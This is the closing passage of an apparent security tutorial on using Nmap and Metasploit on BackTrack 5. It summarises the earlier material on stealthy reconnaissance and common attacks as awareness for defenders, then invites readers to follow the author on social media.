In this article we have presented the abilities of Nmap as well as Metasploit on BackTrack 5. We have shown the trick of hiding in the network while performing intelligent information gathering. The author also showed a set of attacks commonly carried out by attackers, to show how fast they can compromise a system. As you can see, the growth of these tools can help anyone become a security pentester, while in the wrong hands they could do more damage than good: such an attack is much easier to perform and more likely to succeed. The author sincerely hopes that these short articles increase the awareness of anyone handling computer or security services. In the broader sense, we hope that the information helps you secure your organization's assets in a better manner.
Summary
Stay tuned for my next articles. Let us know what you thought, what you learned and what you hope for in the next articles! Connect with us on GOOGLE+, TWITTER and FACEBOOK.